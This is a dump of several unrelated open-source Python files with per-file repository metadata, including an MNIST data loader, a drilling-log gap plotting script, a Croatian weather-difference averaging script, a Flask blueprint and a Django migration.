lib.run_benchmark("--workload I --start-key 0 --keys 100 -o I1,I2,I3,S10,B20,D,b --random")
lib.check_for_range(0, 100, lambda meta, key, bins: check_bins(bins))
def test_compound_multiple_bins():
def check_bins(b):
assert(len(b) == 7)
assert(type(b["testbin"]) is list)
lib.obj_spec_is_I1(b["testbin"][0])
assert(type(b["testbin"][1]) is dict)
assert(len(b["testbin"][1]) == 45)
for key in b["testbin"][1]:
lib.obj_spec_is_S(key, 32)
lib.obj_spec_is_B(b["testbin"][1][key], 20)
lib.obj_spec_is_I2(b["testbin_2"])
lib.obj_spec_is_I3(b["testbin_3"])
assert(type(b["testbin_4"]) is dict)
assert(len(b["testbin_4"]) == 1)
for key in b["testbin_4"]:
lib.obj_spec_is_S(key, 10)
lib.obj_spec_is_I4(b["testbin_4"][key])
lib.obj_spec_is_B(b["testbin_5"], 20)
assert(type(b["testbin_6"]) is list)
assert(len(b["testbin_6"]) == 10)
for item in b["testbin_6"]:
lib.obj_spec_is_D(item)
lib.obj_spec_is_b(b["testbin_7"])
lib.run_benchmark("--workload I --start-key 0 --keys 100 " +
"-o [I1,{45*S32:B20}],I2,I3,{S10:I4},B20,[10*D],b --random")
lib.check_for_range(0, 100, lambda meta, key, bins: check_bins(bins))
| 38.503876 | 109 | 0.686531 | 1,881 | 9,934 | 3.400319 | 0.04891 | 0.066604 | 0.111007 | 0.133208 | 0.894622 | 0.829425 | 0.792683 | 0.767824 | 0.763133 | 0.755629 | 0 | 0.071092 | 0.123515 | 9,934 | 257 | 110 | 38.653697 | 0.663489 | 0 | 0 | 0.166667 | 0 | 0.025253 | 0.279501 | 0.010371 | 0 | 0 | 0 | 0 | 0.116162 | 1 | 0.237374 | false | 0 | 0.005051 | 0 | 0.242424 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
bde488d1b4bdd414a90b8ecc40fa76af472c89b2 | 1,292 | py | Python | stn/data_loader.py | lzmisscc/emoran | f7360ac21b0c8657244d75ec927020fb26c41fea | [
"MIT"
] | null | null | null | stn/data_loader.py | lzmisscc/emoran | f7360ac21b0c8657244d75ec927020fb26c41fea | [
"MIT"
] | null | null | null | stn/data_loader.py | lzmisscc/emoran | f7360ac21b0c8657244d75ec927020fb26c41fea | [
"MIT"
] | 1 | 2021-02-03T18:40:44.000Z | 2021-02-03T18:40:44.000Z | # encoding: utf-8
import torch
import random
from torchvision import datasets, transforms
def get_train_loader(args):
return torch.utils.data.DataLoader(
datasets.MNIST(
'mnist_data',
train=True,
download=True,
transform=transforms.Compose([
transforms.Lambda(lambda image: image.rotate(random.random() * args.angle * 2 - args.angle)),
transforms.Resize((args.image_height, args.image_width)),
transforms.ToTensor(),
]),
),
batch_size=args.batch_size,
shuffle=True,
num_workers=4,
pin_memory=True if args.cuda else False,
)
def get_test_loader(args):
return torch.utils.data.DataLoader(
datasets.MNIST(
'mnist_data',
train=False,
download=True,
transform=transforms.Compose([
transforms.Lambda(lambda image: image.rotate(random.random() * args.angle * 2 - args.angle)),
transforms.Resize((args.image_height, args.image_width)),
transforms.ToTensor(),
]),
),
batch_size=args.batch_size,
shuffle=True,
num_workers=4,
pin_memory=True if args.cuda else False,
)
| 28.711111 | 109 | 0.578947 | 136 | 1,292 | 5.367647 | 0.338235 | 0.049315 | 0.043836 | 0.057534 | 0.857534 | 0.857534 | 0.857534 | 0.857534 | 0.857534 | 0.857534 | 0 | 0.005669 | 0.317337 | 1,292 | 44 | 110 | 29.363636 | 0.821995 | 0.01161 | 0 | 0.756757 | 0 | 0 | 0.015686 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.054054 | false | 0 | 0.081081 | 0.054054 | 0.189189 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
da0b2447d2d4f8efa58ebc5cdf8876fbd14c4471 | 3,596 | py | Python | core_gap_stats.py | AndrzejTunkiel/Tape | 1f6a7c337d9f3557452cb5c80c2dfc4d99085be3 | [
"MIT"
] | null | null | null | core_gap_stats.py | AndrzejTunkiel/Tape | 1f6a7c337d9f3557452cb5c80c2dfc4d99085be3 | [
"MIT"
] | null | null | null | core_gap_stats.py | AndrzejTunkiel/Tape | 1f6a7c337d9f3557452cb5c80c2dfc4d99085be3 | [
"MIT"
] | 1 | 2021-11-15T01:21:22.000Z | 2021-11-15T01:21:22.000Z | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Mar 17 09:36:28 2021
@author: llothar
"""
from statistics_module import stats
import pandas as pd
import matplotlib.pyplot as plt
import numpy as np
plt.style.use(['science','no-latex'])
df = pd.read_csv('f9ad.csv')
#%%
s, m, per = stats(df)
target = 'MWD Continuous Inclination dega'
#plt.style.use(['science','no-latex'])
## Gap statistics for target
#
# This chart will show the percentage of dataset occupied by gaps of a certain
# size. Gaps are normal in drilling logs and nothing to be afraid of
x_label = per[target]['gap_sizes']
x = np.arange(0, len(x_label),1)
my_figsize = (7,2.5)
plt.figure(figsize=my_figsize)
y = per[target]['percentage_cells_occupied']
plt.xticks(x, x_label, rotation=90)
plt.bar(x,y, color='gray')
#plt.title(f'Gap distribution in:\n {target}')
plt.xlabel('Gap length [rows]')
plt.ylabel('Dataset occupied [%]')
plt.xlim(-1,51)
#x_labels = x.tolist()
#x_labels[0] = 'data'
#plt.xticks(x, x_labels)
plt.grid()
plt.tight_layout()
plt.savefig('raw_gaps_stats.pdf')
plt.show()
## Outlier detection
outlier_cutoff = 0.005 #arbitrarily selected
# calculation that penalizes long, rare, continuous gaps
out_coef = per[target]['gap_sizes'] / (per[target]['gap_counts'] * len(df))
x = np.arange(0,len(per[target]['gap_sizes']),1)
x_label = per[target]['gap_sizes']
x = np.arange(0, len(x_label),1)
plt.figure(figsize=my_figsize)
plt.xticks(x, x_label, rotation=90)
plt.bar(x,out_coef, color='gray')
#plt.ylim(0,0.005)
plt.plot([-1,51],[outlier_cutoff]*2, color='black', label='cutoff',
linestyle='--')
plt.legend()
# x_labels = x.tolist()
# x_labels[0] = 'data'
# plt.xticks(x, x_labels)
plt.xlim(-1,51)
#plt.title(f'Gap coefficient in: {target}')
plt.xlabel('Gap length [rows]')
plt.ylabel('Gap coefficient')
plt.grid()
plt.tight_layout()
plt.savefig('proc_gaps_stats.pdf')
plt.show()
#%%
#%%
s, m, per = stats(df)
target = 'Average Surface Torque kN.m'
#plt.style.use(['science','no-latex'])
## Gap statistics for target
#
# This chart will show the percentage of dataset occupied by gaps of a certain
# size. Gaps are normal in drilling logs and nothing to be afraid of
x_label = per[target]['gap_sizes']
x = np.arange(0, len(x_label),1)
my_figsize = (5,2.5)
plt.figure(figsize=my_figsize)
y = per[target]['percentage_cells_occupied']
plt.xticks(x, x_label, rotation=90)
plt.bar(x,y, color='gray')
#plt.title(f'Gap distribution in:\n {target}')
plt.xlabel('Gap length [rows]')
plt.ylabel('Dataset occupied [%]')
plt.xlim(-1,16)
# x_labels = x.tolist()
# x_labels[0] = 'data'
# plt.xticks(x, x_labels)
plt.grid()
plt.tight_layout()
plt.savefig('raw_gaps_stats_phd.pdf')
plt.show()
## Outlier detection
outlier_cutoff = 0.005 #arbitrarily selected
# calculation that penalizes long, rare, continuous gaps
out_coef = per[target]['gap_sizes'] / (per[target]['gap_counts'] * len(df))
x = np.arange(0,len(per[target]['gap_sizes']),1)
x_label = per[target]['gap_sizes']
x = np.arange(0, len(x_label),1)
plt.figure(figsize=my_figsize)
plt.xticks(x, x_label, rotation=90)
plt.bar(x,out_coef, color='gray')
#plt.ylim(0,0.005)
plt.plot([-1,16],[outlier_cutoff]*2, color='black', label='cutoff',
linestyle='--')
plt.legend()
# x_labels = x.tolist()
# x_labels[0] = 'data'
# plt.xticks(x, x_labels)
plt.xlim(-1,16)
#plt.title(f'Gap coefficient in: {target}')
plt.xlabel('Gap length [rows]')
plt.ylabel('Gap coefficient')
plt.grid()
plt.tight_layout()
plt.savefig('proc_gaps_stats_phd.pdf')
plt.show()
plt.scatter(df['Measured Depth m'], df[target], s=1)
plt.show() | 25.323944 | 78 | 0.698554 | 607 | 3,596 | 4.026359 | 0.237232 | 0.02946 | 0.0491 | 0.055646 | 0.885025 | 0.880933 | 0.849427 | 0.849427 | 0.849427 | 0.849427 | 0 | 0.02644 | 0.116518 | 3,596 | 142 | 79 | 25.323944 | 0.742839 | 0.32703 | 0 | 0.776316 | 0 | 0 | 0.211303 | 0.040067 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.052632 | 0 | 0.052632 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
e527d7578838a8f2a99fbbbb5db91ca83f935d81 | 145 | py | Python | blocksec2go/comm/__init__.py | Infineon/BlockchainSecurity2Go-Python-lib | 477753ae888e2b1c36b851daf150b9734ab99e60 | [
"MIT"
] | 14 | 2019-03-08T11:03:22.000Z | 2021-12-31T07:20:52.000Z | blocksec2go/comm/__init__.py | Infineon/BlockchainSecurity2Go-Python-lib | 477753ae888e2b1c36b851daf150b9734ab99e60 | [
"MIT"
] | 13 | 2019-07-25T10:43:25.000Z | 2021-12-22T13:55:41.000Z | blocksec2go/comm/__init__.py | Infineon/BlockchainSecurity2Go-Python-lib | 477753ae888e2b1c36b851daf150b9734ab99e60 | [
"MIT"
] | 6 | 2019-03-25T22:48:24.000Z | 2021-12-07T15:53:52.000Z | from blocksec2go.comm.pyscard import open_pyscard
from blocksec2go.comm.base import CardError
from blocksec2go.comm.card_observer import observer | 48.333333 | 51 | 0.882759 | 20 | 145 | 6.3 | 0.5 | 0.357143 | 0.452381 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.022388 | 0.075862 | 145 | 3 | 51 | 48.333333 | 0.91791 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
e54c1e20032181d545824909664737fe413d1314 | 18,290 | py | Python | avg.py | svenazari/avg | 0f6e9c6d1c53354b0dd10002c3dc419bd74869ad | [
"MIT"
] | null | null | null | avg.py | svenazari/avg | 0f6e9c6d1c53354b0dd10002c3dc419bd74869ad | [
"MIT"
] | null | null | null | avg.py | svenazari/avg | 0f6e9c6d1c53354b0dd10002c3dc419bd74869ad | [
"MIT"
] | null | null | null | #avg.py
#autor: Sven Azari
#http://www.github.com/svenazari
#naredbe: del, del1, izl, show, memload, memclear
#Kako bi se mogla koristiti naredba memload, u istom folderu kao i skripta mora biti i datoteka '.avg_mem.txt'
import sys
from os import system, name
from os.path import exists
def clear (): #čišćenje zaslona
if name == 'nt':
_ = system('cls')
else:
_ = system('clear')
def average ():
clear ()
if exists('.avg_mem.txt') == False: #provjera da li postoji datoteka .avg_mem.txt - ako je nema, skripta ju kreira kako bi bio omogućen upis nakon kalkulacija
f = open('.avg_mem.txt', 'w+')
Traz = [] #lista za razlike u temperaturi zraka
Uraz = [] #lista za razlike u relativnoj vlazi zraka
while True:
Tk = input ("Tk = ") #temperatura zraka klasično
if Tk == "show":
print (Traz)
print (Uraz)
print ("* * * ")
continue
elif Tk == "del":
clear()
try:
del Traz[-1]
del Uraz[-1]
except: #ako su liste već prazne
print ("Učitana memorija ne sadrži podatke!")
else:
try:
Tsred = str(round(sum(Traz) / len(Traz),1)) #izračun prosječne vrijednosti razlike temperature zraka (len(Traz) - dužina liste)
Usred = str(round(sum(Uraz) / len(Uraz))) #izračun prosječne vrijednosti razlike relativne vlage zraka
except ZeroDivisionError: #ako je upravo izbrisan zadnji unos u list
print ("Učitana memorija ne sadrži podatke!")
else:
#ispis
print ("# dTs = " + Tsred + " #")
print ("# dUs = " + Usred + " #")
print ("(Srednju razliku treba dodati na podatak AMP-a)")
print ("* * * ")
continue
elif Tk == "del1":
clear()
try:
del Traz[0]
del Uraz[0]
except: #ako su liste već prazne
print ("Učitana memorija ne sadrži podatke!")
else:
try:
Tsred = str(round(sum(Traz) / len(Traz),1)) #izračun prosječne vrijednosti razlike temperature zraka (len(Traz) - dužina liste)
Usred = str(round(sum(Uraz) / len(Uraz))) #izračun prosječne vrijednosti razlike relativne vlage zraka
except ZeroDivisionError: #ako je upravo izbrisan zadnji unos u list
print ("Učitana memorija ne sadrži podatke!")
else:
#ispis
print ("# dTs = " + Tsred + " #")
print ("# dUs = " + Usred + " #")
print ("(Srednju razliku treba dodati na podatak AMP-a)")
print ("* * * ")
continue
elif Tk == "memload": #učitavanje spremljenih podataka razlike - memload će izbrisati svaki postojeći izračun
clear()
Traz.clear()
Uraz.clear()
meml = []
memlf = [] #float od meml
with open('.avg_mem.txt') as mem:
meml = mem.readlines() #čitanje linija i upis u listu
for line in meml: #upis u novu lisu kao float
memlx = float(line)
memlf.append(memlx)
x = int(len(memlf) / 2) #polovina od memlf
Tmem = memlf[:x] #učitavanje razlike temperature
Umem = memlf[x:] #učitavanje razlike vlage
Traz.extend(Tmem) #dodavanje memorije na listu razlike temperature
Uraz.extend(Umem) #dodavanje memorije na listu razlike vlage
try:
Tsred = str(round(sum(Traz) / len(Traz),1)) #izračun prosječne vrijednosti razlike temperature zraka (len(Traz) - dužina liste)
Usred = str(round(sum(Uraz) / len(Uraz))) #izračun prosječne vrijednosti razlike relativne vlage zraka
except ZeroDivisionError: #ako je datoteka .avg_mem.txt prazna
print ("Učitana memorija ne sadrži podatke!")
else:
#ispis
print ("# dTs = " + Tsred + " #")
print ("# dUs = " + Usred + " #")
print ("(Srednju razliku treba dodati na podatak AMP-a)")
print ("* * * ")
continue
elif Tk == "memclear": #čišćenje memorije skripte
clear()
Traz.clear()
Uraz.clear()
print ("Memorija skripte je očišćena!")
continue
elif Tk == "izl":
clear()
exit()
Ta = input ("Ta = ") #temperatura zraka automatsko
if Ta == "show":
print (Traz)
print (Uraz)
continue
elif Ta == "del":
clear()
try:
del Traz[-1]
del Uraz[-1]
except: #ako su liste već prazne
print ("Učitana memorija ne sadrži podatke!")
else:
try:
Tsred = str(round(sum(Traz) / len(Traz),1)) #izračun prosječne vrijednosti razlike temperature zraka (len(Traz) - dužina liste)
Usred = str(round(sum(Uraz) / len(Uraz))) #izračun prosječne vrijednosti razlike relativne vlage zraka
except ZeroDivisionError: #ako je upravo izbrisan zadnji unos u list
print ("Učitana memorija ne sadrži podatke!")
else:
#ispis
print ("# dTs = " + Tsred + " #")
print ("# dUs = " + Usred + " #")
print ("(Srednju razliku treba dodati na podatak AMP-a)")
print ("* * * ")
continue
elif Ta == "del1":
clear()
try:
del Traz[0]
del Uraz[0]
except: #ako su liste već prazne
print ("Učitana memorija ne sadrži podatke!")
else:
try:
Tsred = str(round(sum(Traz) / len(Traz),1)) #izračun prosječne vrijednosti razlike temperature zraka (len(Traz) - dužina liste)
Usred = str(round(sum(Uraz) / len(Uraz))) #izračun prosječne vrijednosti razlike relativne vlage zraka
except ZeroDivisionError: #ako je upravo izbrisan zadnji unos u list
print ("Učitana memorija ne sadrži podatke!")
else:
#ispis
print ("# dTs = " + Tsred + " #")
print ("# dUs = " + Usred + " #")
print ("(Srednju razliku treba dodati na podatak AMP-a)")
print ("* * * ")
continue
elif Ta == "memload": #učitavanje spremljenih podataka razlike - memload će izbrisati svaki postojeći izračun
clear()
Traz.clear()
Uraz.clear()
meml = []
memlf = [] #float od meml
with open('.avg_mem.txt') as mem:
meml = mem.readlines() #čitanje linija i upis u listu
for line in meml: #upis u novu lisu kao float
memlx = float(line)
memlf.append(memlx)
x = int(len(memlf) / 2) #polovina od memlf
Tmem = memlf[:x] #učitavanje razlike temperature
Umem = memlf[x:] #učitavanje razlike vlage
Traz.extend(Tmem) #dodavanje memorije na listu razlike temperature
Uraz.extend(Umem) #dodavanje memorije na listu razlike vlage
try:
Tsred = str(round(sum(Traz) / len(Traz),1)) #izračun prosječne vrijednosti razlike temperature zraka (len(Traz) - dužina liste)
Usred = str(round(sum(Uraz) / len(Uraz))) #izračun prosječne vrijednosti razlike relativne vlage zraka
except ZeroDivisionError: #ako je datoteka .avg_mem.txt prazna
print ("Učitana memorija ne sadrži podatke!")
else:
#ispis
print ("# dTs = " + Tsred + " #")
print ("# dUs = " + Usred + " #")
print ("(Srednju razliku treba dodati na podatak AMP-a)")
print ("* * * ")
continue
elif Ta == "memclear": #čišćenje memorije skripte
clear()
Traz.clear()
Uraz.clear()
print ("Memorija skripte je očišćena!")
continue
elif Ta == "izl":
clear()
exit()
print ("*")
Uk = input ("Uk = ") #vlaga zraka klasično
if Uk == "show":
print (Traz)
print (Uraz)
continue
elif Uk == "del":
clear()
try:
del Traz[-1]
del Uraz[-1]
except: #ako su liste već prazne
print ("Učitana memorija ne sadrži podatke!")
else:
try:
Tsred = str(round(sum(Traz) / len(Traz),1)) #izračun prosječne vrijednosti razlike temperature zraka (len(Traz) - dužina liste)
Usred = str(round(sum(Uraz) / len(Uraz))) #izračun prosječne vrijednosti razlike relativne vlage zraka
except ZeroDivisionError: #ako je upravo izbrisan zadnji unos u list
print ("Učitana memorija ne sadrži podatke!")
else:
#ispis
print ("# dTs = " + Tsred + " #")
print ("# dUs = " + Usred + " #")
print ("(Srednju razliku treba dodati na podatak AMP-a)")
print ("* * * ")
continue
elif Uk == "del1":
clear()
try:
del Traz[0]
del Uraz[0]
except: #ako su liste već prazne
print ("Učitana memorija ne sadrži podatke!")
else:
try:
Tsred = str(round(sum(Traz) / len(Traz),1)) #izračun prosječne vrijednosti razlike temperature zraka (len(Traz) - dužina liste)
Usred = str(round(sum(Uraz) / len(Uraz))) #izračun prosječne vrijednosti razlike relativne vlage zraka
except ZeroDivisionError: #ako je upravo izbrisan zadnji unos u list
print ("Učitana memorija ne sadrži podatke!")
else:
#ispis
print ("# dTs = " + Tsred + " #")
print ("# dUs = " + Usred + " #")
print ("(Srednju razliku treba dodati na podatak AMP-a)")
print ("* * * ")
continue
elif Uk == "memload": #učitavanje spremljenih podataka razlike - memload će izbrisati svaki postojeći izračun
clear()
Traz.clear()
Uraz.clear()
meml = []
memlf = [] #float od meml
with open('.avg_mem.txt') as mem:
meml = mem.readlines() #čitanje linija i upis u listu
for line in meml: #upis u novu lisu kao float
memlx = float(line)
memlf.append(memlx)
x = int(len(memlf) / 2) #polovina od memlf
Tmem = memlf[:x] #učitavanje razlike temperature
Umem = memlf[x:] #učitavanje razlike vlage
Traz.extend(Tmem) #dodavanje memorije na listu razlike temperature
Uraz.extend(Umem) #dodavanje memorije na listu razlike vlage
try:
Tsred = str(round(sum(Traz) / len(Traz),1)) #izračun prosječne vrijednosti razlike temperature zraka (len(Traz) - dužina liste)
Usred = str(round(sum(Uraz) / len(Uraz))) #izračun prosječne vrijednosti razlike relativne vlage zraka
except ZeroDivisionError: #ako je datoteka .avg_mem.txt prazna
print ("Učitana memorija ne sadrži podatke!")
else:
#ispis
print ("# dTs = " + Tsred + " #")
print ("# dUs = " + Usred + " #")
print ("(Srednju razliku treba dodati na podatak AMP-a)")
print ("* * * ")
continue
elif Uk == "memclear": #čišćenje memorije skripte
clear()
Traz.clear()
Uraz.clear()
print ("Memorija skripte je očišćena!")
continue
elif Uk == "izl":
clear()
exit()
Ua = input ("Ua = ") #vlaga zraka automatsko
if Ua == "show":
print (Traz)
print (Uraz)
continue
elif Ua == "del":
clear()
try:
del Traz[-1]
del Uraz[-1]
except: #ako su liste već prazne
print ("Učitana memorija ne sadrži podatke!")
else:
try:
Tsred = str(round(sum(Traz) / len(Traz),1)) #izračun prosječne vrijednosti razlike temperature zraka (len(Traz) - dužina liste)
Usred = str(round(sum(Uraz) / len(Uraz))) #izračun prosječne vrijednosti razlike relativne vlage zraka
except ZeroDivisionError: #ako je upravo izbrisan zadnji unos u list
print ("Učitana memorija ne sadrži podatke!")
else:
#ispis
print ("# dTs = " + Tsred + " #")
print ("# dUs = " + Usred + " #")
print ("(Srednju razliku treba dodati na podatak AMP-a)")
print ("* * * ")
continue
elif Ua == "del1":
clear()
try:
del Traz[0]
del Uraz[0]
except: #ako su liste već prazne
print ("Učitana memorija ne sadrži podatke!")
else:
try:
Tsred = str(round(sum(Traz) / len(Traz),1)) #izračun prosječne vrijednosti razlike temperature zraka (len(Traz) - dužina liste)
Usred = str(round(sum(Uraz) / len(Uraz))) #izračun prosječne vrijednosti razlike relativne vlage zraka
except ZeroDivisionError: #ako je upravo izbrisan zadnji unos u list
print ("Učitana memorija ne sadrži podatke!")
else:
#ispis
print ("# dTs = " + Tsred + " #")
print ("# dUs = " + Usred + " #")
print ("(Srednju razliku treba dodati na podatak AMP-a)")
print ("* * * ")
continue
elif Ua == "memload": #učitavanje spremljenih podataka razlike - memload će izbrisati svaki postojeći izračun
clear()
Traz.clear()
Uraz.clear()
meml = []
memlf = [] #float od meml
with open('.avg_mem.txt') as mem:
meml = mem.readlines() #čitanje linija i upis u listu
for line in meml: #upis u novu lisu kao float
memlx = float(line)
memlf.append(memlx)
x = int(len(memlf) / 2) #polovina od memlf
Tmem = memlf[:x] #učitavanje razlike temperature
Umem = memlf[x:] #učitavanje razlike vlage
Traz.extend(Tmem) #dodavanje memorije na listu razlike temperature
Uraz.extend(Umem) #dodavanje memorije na listu razlike vlage
try:
Tsred = str(round(sum(Traz) / len(Traz),1)) #izračun prosječne vrijednosti razlike temperature zraka (len(Traz) - dužina liste)
Usred = str(round(sum(Uraz) / len(Uraz))) #izračun prosječne vrijednosti razlike relativne vlage zraka
except ZeroDivisionError: #ako je datoteka .avg_mem.txt prazna
print ("Učitana memorija ne sadrži podatke!")
else:
#ispis
print ("# dTs = " + Tsred + " #")
print ("# dUs = " + Usred + " #")
print ("(Srednju razliku treba dodati na podatak AMP-a)")
print ("* * * ")
continue
elif Ua == "memclear": #čišćenje memorije skripte
clear()
Traz.clear()
Uraz.clear()
print ("Memorija skripte je očišćena!")
continue
elif Ua == "izl":
clear()
exit()
clear ()
try:
Tkf = float(Tk.replace(",","."))
Taf = float(Ta.replace(",","."))
Ukf = float(Uk.replace(",","."))
Uaf = float(Ua.replace(",","."))
except ValueError: #ako nije moguće pretoviriti u float
print ("Nedostaje podatak ili podaci nisu uneseni u odgovarajućem obliku!")
continue
else:
Tra = round(Tkf - Taf,1)
Ura = round(Ukf - Uaf)
Traz.append(Tra) #dodavanje razlike na listu temperature zraka
Uraz.append(Ura) #dodavanje razlike na listu relativne vlage zraka
Tsred = str(round(sum(Traz) / len(Traz),1)) #izračun prosječne vrijednosti razlike temperature zraka (len(Traz) - dužina liste)
Usred = str(round(sum(Uraz) / len(Uraz))) #izračun prosječne vrijednosti razlike relativne vlage zraka
#ispis
print ("# dTs = " + Tsred + " #")
print ("# dUs = " + Usred + " #")
print ("(Srednju razliku treba dodati na podatak AMP-a)")
print ("* * * ")
#spremanje razlike za učitavanje kod novog pokretanja skripte
Trazs = []
Urazs = []
for line in Traz: #pretvaranje u str
lines = str(round(line,1))
Trazs.append(lines) #upis str u Trazs
for line in Uraz:
lines1 = str(round(line))
Urazs.append(lines1) #upis str u Urazs
upis = open(".avg_mem.txt", "w") #otvaranje datoteke za upis
for line in Trazs: #upis razlike temperature
upis.write(line)
upis.write('\n')
for line in Urazs: #upis razlike vlage
upis.write(line)
upis.write('\n')
upis.close() #zatvaranje datoteke
if Tk == "izl" or Ta == "izl" or Uk == "izl" or Ua == " izl":
break
exit ()
average()
| 46.070529 | 162 | 0.503445 | 1,850 | 18,290 | 4.969189 | 0.111892 | 0.024366 | 0.031111 | 0.09616 | 0.846405 | 0.840966 | 0.835962 | 0.824867 | 0.824867 | 0.824867 | 0 | 0.003803 | 0.396118 | 18,290 | 396 | 163 | 46.186869 | 0.82852 | 0.259541 | 0 | 0.820375 | 0 | 0 | 0.15611 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.005362 | false | 0 | 0.008043 | 0 | 0.013405 | 0.233244 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
e550d9183a9b94c0e41201cd2a23bb028cfbe68e | 93 | py | Python | app/blog_posts/__init__.py | REAGAN2020/Blog-posts | 825eae3a628018ab084b9a0bb61393dc87f74316 | [
"MIT"
] | null | null | null | app/blog_posts/__init__.py | REAGAN2020/Blog-posts | 825eae3a628018ab084b9a0bb61393dc87f74316 | [
"MIT"
] | null | null | null | app/blog_posts/__init__.py | REAGAN2020/Blog-posts | 825eae3a628018ab084b9a0bb61393dc87f74316 | [
"MIT"
] | 2 | 2019-11-30T10:33:16.000Z | 2021-02-03T06:29:40.000Z | from flask import Blueprint
blog_posts = Blueprint('blog_posts',__name__)
from . import views | 31 | 45 | 0.817204 | 13 | 93 | 5.384615 | 0.615385 | 0.371429 | 0.514286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.107527 | 93 | 3 | 46 | 31 | 0.843373 | 0 | 0 | 0 | 0 | 0 | 0.106383 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.666667 | 0 | 0.666667 | 0.666667 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 7 |
e5cfc771c3e1cb6ba95c96954d9cf0e3cb6c29e8 | 2,050 | py | Python | src/django/api/migrations/0026_add_product_and_production_types_to_facilityclaim.py | azavea/open-apparel-registry | 20f7a6d502d9152c85ee7f2696b25b6badf98924 | [
"MIT"
] | 32 | 2019-01-26T05:04:03.000Z | 2022-03-11T15:09:09.000Z | src/django/api/migrations/0026_add_product_and_production_types_to_facilityclaim.py | azavea/open-apparel-registry | 20f7a6d502d9152c85ee7f2696b25b6badf98924 | [
"MIT"
] | 1,586 | 2019-01-15T21:54:42.000Z | 2022-03-31T17:38:14.000Z | src/django/api/migrations/0026_add_product_and_production_types_to_facilityclaim.py | Home-ac/Base0 | 04f03b8bf31146783c583df0871ab69fd6309a27 | [
"MIT"
] | 7 | 2019-02-28T03:32:46.000Z | 2021-11-04T17:03:46.000Z | # Generated by Django 2.0.13 on 2019-07-12 19:36
import django.contrib.postgres.fields
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('api', '0025_add_productiontype_and_producttype'),
]
operations = [
migrations.AddField(
model_name='facilityclaim',
name='facility_product_types',
field=django.contrib.postgres.fields.ArrayField(base_field=models.CharField(help_text='A product produced at the facility', max_length=50, verbose_name='product type'), blank=True, help_text='The products produced at the facility', null=True, size=None, verbose_name='product types'),
),
migrations.AddField(
model_name='facilityclaim',
name='facility_production_types',
field=django.contrib.postgres.fields.ArrayField(base_field=models.CharField(help_text='A production type associated with the facility', max_length=50, verbose_name='production type'), blank=True, help_text='The production types associated with the facility', null=True, size=None, verbose_name='production types'),
),
migrations.AddField(
model_name='historicalfacilityclaim',
name='facility_product_types',
field=django.contrib.postgres.fields.ArrayField(base_field=models.CharField(help_text='A product produced at the facility', max_length=50, verbose_name='product type'), blank=True, help_text='The products produced at the facility', null=True, size=None, verbose_name='product types'),
),
migrations.AddField(
model_name='historicalfacilityclaim',
name='facility_production_types',
field=django.contrib.postgres.fields.ArrayField(base_field=models.CharField(help_text='A production type associated with the facility', max_length=50, verbose_name='production type'), blank=True, help_text='The production types associated with the facility', null=True, size=None, verbose_name='production types'),
),
]
| 58.571429 | 326 | 0.716585 | 247 | 2,050 | 5.785425 | 0.251012 | 0.044787 | 0.073478 | 0.094472 | 0.863541 | 0.863541 | 0.863541 | 0.826452 | 0.775367 | 0.775367 | 0 | 0.016607 | 0.177561 | 2,050 | 34 | 327 | 60.294118 | 0.830961 | 0.022439 | 0 | 0.714286 | 1 | 0 | 0.325674 | 0.089411 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.071429 | 0 | 0.178571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
e5ef391dc140f3f16a1ddf3caf2aeafa8f7e4fbf | 87 | py | Python | EEG_Lightning/dassl/data/__init__.py | mcd4874/NeurIPS_competition | 4df1f222929e9824a55c9c4ae6634743391b0fe9 | [
"MIT"
